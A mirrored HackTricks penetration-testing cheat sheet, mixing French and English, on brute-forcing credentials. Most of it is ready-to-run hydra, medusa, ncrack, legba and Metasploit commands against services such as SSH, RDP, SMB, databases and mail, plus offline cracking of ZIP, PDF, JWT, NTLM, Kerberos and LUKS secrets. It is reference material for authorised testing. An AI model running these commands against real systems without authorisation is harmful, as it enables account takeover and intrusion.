Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/brute-force.md

53 KiB
Raw Blame History

Brute Force - Fiche de triche


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Identifiants par défaut

Recherchez dans Google les identifiants par défaut de la technologie utilisée, ou essayez ces liens :

Créez vos propres dictionnaires

Trouvez autant d'informations que possible sur la cible et générez un dictionnaire personnalisé. Outils qui peuvent aider :

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

Cewl est un outil qui extrait les mots d'un site Web pour générer une liste de mots potentiels à utiliser dans des attaques de force brute.

cewl example.com -m 5 -w words.txt

CUPP

Génère des mots de passe basés sur vos connaissances de la victime (noms, dates...)

python3 cupp.py -h

Wister

Un outil générateur de listes de mots, qui vous permet de fournir un ensemble de mots, vous donnant la possibilité de créer de multiples variations à partir des mots donnés, créant ainsi une liste de mots unique et idéale à utiliser pour un cible spécifique.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

pydictor

Listes de mots


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Services

Classés par ordre alphabétique du nom du service.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

AJP (Apache JServ Protocol) is a binary protocol that can be brute-forced to gain unauthorized access to Apache Tomcat servers.

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

Cassandra is a distributed NoSQL database that can be targeted using brute force attacks. These attacks can be carried out using tools like Hydra or custom scripts to attempt to guess usernames and passwords in order to gain unauthorized access to the database. It is important to secure Cassandra installations with strong authentication mechanisms and regularly update credentials to prevent brute force attacks.

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

Brute Force

Brute force attacks against CouchDB involve attempting to guess valid credentials by systematically trying all possible combinations of usernames and passwords. This can be done using automated tools that repeatedly make login attempts until the correct credentials are found.

Protection

To protect against brute force attacks on CouchDB, consider implementing the following measures:

  1. Strong Credentials: Enforce the use of strong, complex passwords to make it harder for attackers to guess.

  2. Account Lockout: Implement account lockout mechanisms that temporarily lock user accounts after a certain number of failed login attempts.

  3. Rate Limiting: Use rate limiting to restrict the number of login attempts from a single IP address within a specific time frame.

  4. Monitoring: Regularly monitor login attempts and investigate any unusual patterns or spikes in failed logins.

By implementing these protection measures, you can enhance the security of your CouchDB instance and reduce the risk of unauthorized access through brute force attacks.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Registre Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

Brute Force

Brute force attacks against Elasticsearch typically involve attempting to guess the credentials of the Elasticsearch instance by trying many different username and password combinations. This can be done using automated tools that systematically try all possible combinations until the correct one is found.

To protect against brute force attacks, it is recommended to:

  • Use strong and unique passwords for all Elasticsearch instances.
  • Implement account lockout policies to lock out users after a certain number of failed login attempts.
  • Monitor Elasticsearch logs for any suspicious login activity.
  • Consider using multi-factor authentication for an added layer of security.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

Brute Force

Brute force attacks against FTP servers involve trying to log in using a massive number of username and password combinations until a valid one is found. This is typically achieved using automated tools that can rapidly test different credentials.

Protection

To protect against brute force attacks on FTP servers, you can implement the following measures:

  • Strong Passwords: Enforce the use of strong, complex passwords that are difficult to guess.
  • Account Lockout Policy: Implement an account lockout policy that locks out an account after a certain number of failed login attempts.
  • IP Whitelisting: Allow only specific IP addresses to connect to the FTP server, reducing the attack surface.
  • Monitoring: Regularly monitor FTP server logs for any suspicious login activities.
  • Two-Factor Authentication: Implement two-factor authentication to add an extra layer of security to the login process.
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Brute HTTP Générique

WFuzz

Authentification de base HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Post Form

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is often used in combination with automated tools to speed up the process. Brute force attacks can be effective against weak passwords or encryption keys.

Dictionary Attack

A dictionary attack involves using a predefined list of words or phrases to attempt to guess the password. This method is more efficient than brute force as it focuses on commonly used passwords or phrases. Dictionary attacks can be successful if the target is using a common or easily guessable password.

Rainbow Table Attack

Rainbow table attacks are a type of precomputed brute force attack that uses a large list of precomputed hashes to crack passwords. This method is effective against hashed passwords, as it allows attackers to quickly look up the corresponding plaintext password in the rainbow table.

Credential Stuffing

Credential stuffing is a type of brute force attack that involves using automated tools to try large numbers of username and password combinations obtained from data breaches. Attackers use these credentials to gain unauthorized access to user accounts on various platforms.

Hydra

Hydra is a popular password-cracking tool that supports multiple protocols, including HTTP, HTTPS, FTP, SMB, and more. It can perform brute force and dictionary attacks to crack passwords and gain unauthorized access to systems.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Pour https vous devez changer de "http-post-form" à "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

IMAP (Internet Message Access Protocol) is a widely used protocol for email retrieval. It is commonly targeted in brute-force attacks to gain unauthorized access to email accounts. Attackers use automated tools to systematically try different username and password combinations until they find the correct one. This is why it is crucial to use strong, unique passwords and enable multi-factor authentication to protect against brute-force attacks.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

Brute Force

Brute force attacks on IRC are typically used to guess the passwords of user accounts. These attacks involve trying all possible combinations of characters until the correct password is found. Brute force attacks can be time-consuming but are often successful if the password is weak.

Protection

To protect against brute force attacks on IRC, users should choose strong and unique passwords that are not easily guessable. Additionally, enabling account lockout policies after a certain number of failed login attempts can help prevent brute force attacks.

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

JWT

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

LDAP (Lightweight Directory Access Protocol) is a protocol used for accessing and maintaining directory services over a network. It is commonly used for authentication and storing information about users, groups, and devices in a centralized directory. LDAP servers are often targeted for brute force attacks to gain unauthorized access to sensitive information.

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol that is widely used in IoT (Internet of Things) applications. It is designed for connections with remote locations where a "small code footprint" is required or the network bandwidth is limited. MQTT operates on top of the TCP/IP protocol, making it suitable for communication over the internet.

ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

Brute Force

Brute force attacks against MSSQL servers can be carried out using tools like Hydra or Ncrack. These tools allow you to systematically try all possible combinations of usernames and passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockouts if too many incorrect attempts are made. It is recommended to use strong and complex passwords to mitigate the risk of a successful brute force attack.

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

Brute Force

Brute force attacks are a common method used to gain unauthorized access to MySQL databases. Attackers use automated tools to try all possible combinations of usernames and passwords until they find the correct one. This method can be effective if weak credentials are used. To protect against brute force attacks, it is recommended to use strong, complex passwords, limit login attempts, and implement multi-factor authentication.

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is often used when there is no other way to obtain the required information. In the case of OracleSQL, brute force attacks can be used to crack passwords or gain unauthorized access to databases.

Protection

To protect against brute force attacks in OracleSQL, it is recommended to:

  • Implement strong password policies
  • Enforce account lockout after a certain number of failed login attempts
  • Monitor and log login attempts for suspicious activity
  • Use multi-factor authentication for an added layer of security

By following these protection measures, you can significantly reduce the risk of falling victim to brute force attacks in OracleSQL.

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Pour utiliser oracle_login avec patator, vous devez installer:

pip3 install cx_Oracle --upgrade

Bruteforce de hachage OracleSQL hors ligne (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, et 11.2.0.3) :

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

Brute Force

Brute force attacks are a common method used to gain unauthorized access to accounts. This technique involves trying all possible combinations of usernames and passwords until the correct one is found. Brute force attacks can be time-consuming but are often successful if the passwords are weak or easily guessable.

Protection

To protect against brute force attacks, it is essential to use strong, unique passwords for each account. Additionally, implementing account lockout policies can help prevent attackers from making multiple login attempts. Using multi-factor authentication can also add an extra layer of security to accounts and make them less vulnerable to brute force attacks.

Tools

There are various tools available that can automate the brute force process, such as Hydra, Medusa, and Ncrack. These tools can help attackers quickly test a large number of passwords and usernames to find the correct combination and gain unauthorized access to accounts.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

Brute Force

Brute force attacks against PostgreSQL databases involve trying all possible combinations of usernames and passwords until the correct one is found. This can be done using automated tools like Hydra or Medusa. It is important to use strong and complex passwords to prevent successful brute force attacks. Additionally, implementing account lockout policies can help mitigate the risk of unauthorized access.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Vous pouvez télécharger le paquet .deb à installer depuis https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP is commonly used for remote administration and accessing virtual desktops.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis (Remote Dictionary Server) est un système de stockage de données en mémoire open source, utilisé comme base de données, cache et courtier de messages. Il prend en charge diverses structures de données telles que les chaînes, les hachages, les listes, les ensembles, les ensembles triés, les bitmaps, les hyperloglogs et les index géospatiaux avec des requêtes de rayon. Redis prend également en charge la réplication, la persistance des données, les sauvegardes, la haute disponibilité et bien plus encore.

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Rexec

Rexec is a simple service that allows users to execute commands on a remote system. It is often used by administrators to manage servers and network devices. Attackers can abuse Rexec by attempting to brute force login credentials to gain unauthorized access to the remote system.

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

Rlogin est un protocole de connexion distant qui peut être attaqué en utilisant des attaques de force brute pour deviner les mots de passe.

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually very time-consuming and resource-intensive, but it can be effective against weak passwords.

Tools
  • Hydra
  • Medusa
  • Ncrack
Techniques
  • Dictionary Attack
  • Hybrid Attack
  • Rainbow Table Attack
Prevention
  • Use complex and unique passwords
  • Implement account lockout policies
  • Use multi-factor authentication
hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

Le protocole de streaming en temps réel (RTSP) est un protocole de contrôle utilisé dans les systèmes de communication et de divertissement pour le contrôle de la diffusion en continu de médias.

hydra -l root -P passwords.txt <IP> rtsp

SFTP

SFTP (Secure File Transfer Protocol) is a secure way to transfer files between machines over a network. It provides encryption for both authentication credentials and data transferred between the client and server.

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

SMB

SMB (Server Message Block) is a protocol for sharing resources, such as files and printers, over a network. It is widely used in Windows networks. Brute forcing SMB involves trying different username and password combinations to gain unauthorized access to an SMB server. This can be done using tools like Hydra or Metasploit. It is important to note that brute forcing is illegal and unethical unless you have explicit permission to do so as part of a penetration test.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

SMTP (Simple Mail Transfer Protocol) is a communication protocol for email transmission. It is widely used for sending emails over the Internet.

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

CHAUSSETTES

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

Brute Force

Brute force attacks against SQL Server involve trying all possible combinations of usernames and passwords until a successful login is found. This method can be time-consuming but is effective if the credentials are weak. Tools like Hydra and Medusa can be used to automate the brute force process. It is important to note that brute force attacks can be detected and prevented by implementing account lockout policies and using strong, complex passwords.

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

Brute Force

Brute force attacks are a common method used to gain unauthorized access to SSH servers. Attackers use automated tools to try all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective if the credentials are weak. To protect against brute force attacks, it is recommended to use strong, complex passwords, implement account lockout policies, and use tools like fail2ban to block repeated login attempts from the same IP address.

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Clés SSH faibles / PRNG prévisible de Debian

Certains systèmes présentent des failles connues dans la graine aléatoire utilisée pour générer du matériel cryptographique. Cela peut entraîner une réduction drastique de l'espace des clés qui peut être brute-forcé avec des outils tels que snowdroppe/ssh-keybrute. Des ensembles de clés faibles pré-générées sont également disponibles, comme g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ et OpenMQ)

Le protocole textuel STOMP est un protocole de messagerie largement utilisé qui permet une communication et une interaction transparentes avec des services de file d'attente de messages populaires tels que RabbitMQ, ActiveMQ, HornetQ et OpenMQ. Il offre une approche normalisée et efficace pour échanger des messages et effectuer diverses opérations de messagerie.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet est un protocole de communication utilisé pour se connecter à des appareils distants. Il est souvent utilisé pour l'administration à distance des appareils réseau. Les attaquants peuvent utiliser des attaques de force brute pour deviner les identifiants de connexion Telnet et accéder illégalement à des appareils distants.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

VNC

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

Winrm (Windows Remote Management) est un protocole de gestion à distance utilisé pour l'administration des systèmes Windows. Il est possible d'effectuer une attaque de force brute contre Winrm en essayant de deviner les identifiants d'authentification.

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Local

Bases de données de craquage en ligne

Consultez ceci avant d'essayer de faire une attaque par force brute sur un Hash.

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.john
john zip.john

#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Attaque par force brute de texte en clair connu

Vous devez connaître le texte en clair (ou une partie du texte en clair) d'un fichier contenu à l'intérieur du zip chiffré. Vous pouvez vérifier les noms de fichiers et la taille des fichiers contenus à l'intérieur d'un zip chiffré en exécutant : 7z l encrypted.zip
Téléchargez bkcrack depuis la page des versions.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is time-consuming but effective, especially against weak passwords. Tools like Hydra and Medusa can automate the process.

Protection

To protect against brute force attacks, implement measures such as account lockouts after a certain number of failed attempts, CAPTCHA challenges, and enforcing strong password policies. Additionally, consider implementing multi-factor authentication for an extra layer of security.

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

Mot de passe propriétaire PDF

Pour craquer un mot de passe propriétaire PDF, consultez ceci : https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

Craquage NTLM

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

Keberoasting est une technique utilisée pour extraire des hachages de mots de passe à partir de services tels que Kerberos en exploitant les faiblesses des hachages de type 5.

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Image Lucks

Méthode 1

Installer: https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Méthode 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Mysql

Un autre tutoriel Luks BF : http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
